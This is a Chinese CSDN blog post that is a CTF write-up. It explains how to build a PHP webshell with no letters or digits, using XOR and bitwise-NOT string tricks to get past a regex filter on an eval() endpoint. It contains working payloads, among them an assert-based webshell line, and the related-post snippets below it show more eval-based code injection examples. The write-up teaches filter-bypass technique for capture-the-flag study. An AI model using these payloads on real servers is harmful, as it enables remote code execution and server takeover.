PHP无字母数字构造Webshell

最新推荐文章于 2023-08-19 23:22:20 发布
最新推荐文章于 2023-08-19 23:22:20 发布
阅读量1.6k 收藏 3
点赞数
分类专栏: web 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45089570/article/details/104156744
版权

题目

index.php:
<?php
include 'flag.php';
if(isset($_GET['code'])){
    $code = $_GET['code'];
    if(strlen($code)>40){ //检测字符长度
        die("Long.");
    }
    if(preg_match("/[A-Za-z0-9]+/",$code)){ //限制字母和数字
        die("NO.");
    }
    @eval($code); //$code的值要为非字母和数字
}else{
    highlight_file(__FILE__);
}
//$hint =  "php function getFlag() to get flag";
?>

flag.php:

<?php
	function getFlag(){
		$flag = "flag is here";
		echo $flag;
};
?>

解题过程

方法一

在PHP中,两个字符串执行异或操作以后,得到的还是一个字符串。所以,我们想得到a-z中某个字母,就找到某两个非字母、数字的字符,他们的异或结果是这个字母即可。

<?php
    var_dump('#'^'|'); //得到字符 _
    var_dump('.'^'~'); //得到字符 P
	var_dump('/'^'`'); //得到字符 0
	var_dump('|'^'/'); //得到字符 S
	var_dump('{'^'/'); //得到字符 T
	$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");
	//变量$__值为字符串'_POST'
?>

websell:

<?php
@$_++; //$_=NULL=0  $_++=1
$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/"); //_POST
${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]);
?>

答案

$_="`{{{"^"?<>/";${$_}[_](${$_}[__]);&_=getFlag
    
$_="`{{{"^"?<>/"; //_GET
${$_}[_](${$_}[__]); //$_GET[_]($_GET[__])
&_=getFlag //执行函数 eval("getFlag(null)")

webshell:
$_="`{{{"^"?<>/";${$_}[_](${$_}[__]);&_=assert&__=phpinfo()

其他类型答案

如果在加上不能有&_字符呢?

只要eval函数执行了“getFlag()”字符串即可,那么绕过正则匹配即可:

把getFlag取反然后URL编码:

?code= =   _=~%98%9A%8B%B9%93%9E%98; = _();


这里为什么正则没有检测到,因为后端自动进行了解码,解码为非字母和数字字符,而eval执行了取反还原为getFlag字符。

既然可以利用取反~进行编码绕过正则检测,那么也可以取反编码GET、_POST。

参考链接 :https://blog.csdn.net/a15803617402/article/details/83589181

西部壮仔
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
远程代码执行RCE
7hinkSource的博客
08-18 307
条件 程序中含有可以执行php代码的函数或者语言结构 传入的参数可控,可直接修改或影响 导致代码注入的函数 eval():将字符串当做php代码执行 <?php if(isset($_GET['code'])){ $code=$_GET['code']; eval($code); } ?>//?code=phpinfo(); assert():将字符串当做php代码执行 <?php if(isset($_GET['code'])){ $code=$_GET['code'
字母数字webshell进阶收藏版1
08-03
1.原理 2.缩短 3.压榨 1.Unicode补充 2.数字需要
PHP代码注入详解
Zeker62的博客
08-16 5056
PHP代码注入的原理和解析 PHP代码注入靠的是RCE,即远程代码执行。 指应用程序过滤不严,hacker可以将代码注入到服务器进行远程的执行。 危害和SSRF相似,通过这个漏洞可以操控服务器的动作。 最典型的就是一句话木马。 PHP代码漏洞注入的两个要素: 程序中含有可执行的PHP代码函数 传入第一点的参数,客户端可控,直接修改或者影响 下面将对PHP相关函数和语句以及注入方法进行解释 eval() eval()函数在很多语言中都有,比如Python、PHP。 eval函数的作用是将字符串作为PHP
记一次拿webshell踩过的坑(如何用PHP编写一个不包含数字字母的后门)
weixin_33943347的博客
08-06 748
0x01 前言 最近在做代码审计的工作中遇到了一个难题,题目描述如下: &lt;?php include 'flag.php'; if(isset($_GET['code'])){ $code = $_GET['code']; if(strlen($code)&gt;40){ die("Long."); } if(preg_ma...
RCE无参数构造
nobugnomoney的博客
05-24 1341
一、RCE无参数构造 无参rce,就是说在无法传入参数的情况下,仅仅依靠传入没有参数的函数套娃就可以达到命令执行的效果,这在ctf中也算是一个比较常见的考点,接下来就来详细总结总结它的利用姿势。 核心的代码 if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']); } 也就是说只能传入函数(),但是()里面能有参数,要是有参数的话最终的返回值不是;就不能进行匹配。例如传入A
不包含字母数字webshell
最新发布
m0_59049258的博客
08-19 427
当$ 和 _ 没有被限制时。
Web安全 _ 无字母数字Webshell 总结.pdf
09-06
字母数字Webshell是指避开常规字母数字字符限制的Webshell构造方法。通常,服务器会通过检测输入是否包含字母数字来防止恶意Webshell的注入。然而,这种防护策略可以通过巧妙的编码转换和利用其他非字母数字...
如何通过非数字与字符的方式实现PHP WebShell详解
08-30
本文主要关注的是如何利用非字母和非数字字符,并通过PHP的动态函数功能来执行构造的代码。在PHP 5中,可以利用`assert`函数来实现这一目标,但在PHP 7中,由于`assert`成为语言结构,不能再作为函数名来动态执行...
wso_webshell_php_
10-01
【标题】"wso_webshell_php_" 涉及的核心知识点是WebshellPHP编程语言在网络安全中的应用。 Webshell,又称为Web后门,是一种通过Web服务端口植入的恶意脚本,允许攻击者远程控制被黑服务器。在描述中提到的...
php webshell 无后门
03-31
php webshell 无后门,未加密
PHP-CTF】无字母数字webshell
尚未佩妥剑 转眼便江湖
10-31 7996
PHP字母数字构造Webshell 题目 index.php: &lt;?php include 'flag.php'; if(isset($_GET['code'])){ $code = $_GET['code']; if(strlen($code)&gt;40){ //检测字符长度 die("Long."); } if(preg_match("...
练习php审计一
Moyv的博客
02-07 729
字母数字的语句 PHP脚本 <?php include "flag.php"; if(isset($_GET['code'])){ $code = $_GET['code']; if(strlen($code)>40){ die("Long."); } if(preg_match("/[A-Za-z0-9]+/",$code)){ ...
php危险函数总结
我是齐潇啊
03-28 5474
php危险函数笔记总结以及实操结果
CTF赛题PHP7 正则绕过
kelenwait的博客
08-19 2514
题目为ctf webphp正则绕过题 前言:由于长度限制,且不像其他题目告知flag.php的内容, 笔者并没有求出flag,绕过思路可参考,也欢迎ctf大佬指点迷津。 题目如下,解析flag.php中的flag变量 <?php include("flag.php"); if(isset($_GET['code'])){ $code = $_GET['code']; if(strlen($code)>20){ die("Too Long."); }
[极客大挑战 2019]RCE ME
06-29 177
打开后是源码,进行源码审计。 <?php error_reporting(0); if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long.");
一天一道ctf 第43天(php字符串异或取反绕过)
scrawman的博客
07-24 2513
[极客大挑战 2019]RCE ME 点开题目就是源码 <?php error_reporting(0); if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long.");
PHP代码注入】PHP代码注入漏洞
cc
03-06 6123
call_user_func()等函数都有调用其他函数的功能,其中的一个参数作为要调用的函数名,那如果这个传入的函数名可控,那就可以调用意外的函数来执行我们想要的代码,也就是存在任意代码执行漏洞。以call_user_func($fun,$para)函数为例,该函数的第一个参数作为回调函数,后面的参数为回调函数的参数,将$para这个参数传递给$fun这个函数去执行。我们可以利用file_get_contents()函数,写入文件,该函数的作用在于将第二个参数作为内容写入到第一个参数的文件中。
ctfshow php特性系列
xiaolong22333的博客
04-18 4307
文章目录web89web90web91web92web93web94web95web96web97web98 web89 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)
WHUCTF做题记录-第九题dank-php
callmelzl的博客
09-26 390
markdown用的不好,并且有写的不恰当的地方还请大佬指正,这题主要的知识点是php反序列化和无数字字母执行函数获取webshell <?php include "flag.php"; show_source(__FILE__); class user { var $name; var $pass; var $secret; } if (isset($_GET['id'])) { $id = $_GET['id']; $usr = unserialize($id);
深入理解无字母数字Webshell:绕过与执行策略
"无字母数字Webshell总结" 在Web安全领域,无字母数字Webshell是一种特殊类型的后门,它设计用于绕过特定的过滤机制。这种Webshell的特点在于其构造方式,不包含传统的字母数字字符,而是利用其他非字母数字字符...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值